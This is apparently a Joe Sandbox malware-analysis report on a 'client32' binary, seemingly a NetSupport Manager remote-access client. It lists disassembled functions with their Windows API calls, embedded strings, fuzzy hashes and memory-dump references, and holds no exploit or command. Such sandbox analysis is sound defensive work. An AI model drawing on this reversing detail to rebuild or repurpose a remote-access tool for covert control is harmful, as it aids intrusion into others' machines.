                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProfileString_memmove
                                                                                • String ID: ,,LPT1:$Device$Windows
                                                                                • API String ID: 1665476579-2967085602
                                                                                • Opcode ID: 84c6e57cbd8fc4f7538afa223db3259dff3af144902b2b86f036842710f49a9f
                                                                                • Instruction ID: 055e85ea75ba770a70e20350d0a84ef6a9c3bf4bb9e235a47bfd0f5fb1665b7d
                                                                                • Opcode Fuzzy Hash: 84c6e57cbd8fc4f7538afa223db3259dff3af144902b2b86f036842710f49a9f
                                                                                • Instruction Fuzzy Hash: E0113B39918267AADB119F70ED41BF9FB68EF55708F1000A8DD8597242FB326609C7B2
                                                                                Function 110BD470 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenu.USER32(?), ref: 110BD4A4
                                                                                • GetSubMenu.USER32(00000000,00000002), ref: 110BD4E5
                                                                                • DrawMenuBar.USER32(?), ref: 110BD50D
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                • m_hWnd, xrefs: 110BD493
                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                • API String ID: 381722633-2830328467
                                                                                • Opcode ID: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                • Instruction ID: 2ed85e2a360b3d02c99ae53d45e4f65cdbccb9b7267b746ab424cefae630bdcb
                                                                                • Opcode Fuzzy Hash: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                                • Instruction Fuzzy Hash: 9B1151BAE00219AFCB04DFA5C894CAFF7B9BF49308B00457EE11697254DB74AD05CB94
                                                                                Function 1102D750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
                                                                                • InterlockedIncrement.KERNEL32(111EE418), ref: 1102D799
                                                                                • InterlockedDecrement.KERNEL32(111EE418), ref: 1102D7C0
                                                                                Strings
                                                                                • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
                                                                                • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked$DecrementIncrementVersion
                                                                                • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                                • API String ID: 1284810544-229394064
                                                                                • Opcode ID: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                • Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
                                                                                • Opcode Fuzzy Hash: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                                • Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1
                                                                                Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                                • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                                • RegisterClassA.USER32(?), ref: 11093483
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassLoad$CursorIconInfoRegister
                                                                                • String ID: NSMClassList
                                                                                • API String ID: 2883182437-2474587545
                                                                                • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                Function 11145660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadStringA.USER32(00000000,00000000,?,11112FE6), ref: 11145678
                                                                                • wsprintfA.USER32 ref: 1114568E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LoadStringwsprintf
                                                                                • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                • API String ID: 104907563-3240211118
                                                                                • Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                                • Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                                • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                                Function 11145450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,11037F05), ref: 11145463
                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11145475
                                                                                • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                • API String ID: 145871493-545709139
                                                                                • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                                • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                                Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                • API String ID: 2446111109-1196874063
                                                                                • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                                • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017428
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                                • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
                                                                                • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessageWindow$FindLongPostSend
                                                                                • String ID: IPTip_Main_Window
                                                                                • API String ID: 3445528842-293399287
                                                                                • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                Function 110698D0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 119COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?,1B702977), ref: 11069909
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • LeaveCriticalSection.KERNEL32(?,?), ref: 110699DC
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 11069A07
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$Enter__wcstoi64
                                                                                • String ID: Buffers$Client
                                                                                • API String ID: 1723449611-673521604
                                                                                • Opcode ID: 112392cb66ba010ec287cafc200a02556091a92033b480183ab92ddcc4a2922c
                                                                                • Instruction ID: 6e52f73104c3b5384aab9ec7da9b21e4f26a08b532b87f3f1e7b4992386e0f41
                                                                                • Opcode Fuzzy Hash: 112392cb66ba010ec287cafc200a02556091a92033b480183ab92ddcc4a2922c
                                                                                • Instruction Fuzzy Hash: E1415A75A04209AFDB14CFA8C880B9EF7F9EF88704F20855DE515DB785DB75A901CB90
                                                                                Function 110CF7D0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,1B702977,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
                                                                                  • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92
                                                                                • IsWindow.USER32(?), ref: 110CF82B
                                                                                  • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                • RemovePropA.USER32(?), ref: 110CF858
                                                                                • DeleteObject.GDI32(?), ref: 110CF86C
                                                                                • DeleteObject.GDI32(?), ref: 110CF876
                                                                                • DeleteObject.GDI32(?), ref: 110CF880
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                • String ID:
                                                                                • API String ID: 1921910413-0
                                                                                • Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                                • Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
                                                                                Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                • %02x, xrefs: 11081610
                                                                                • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                Memory Dump Source
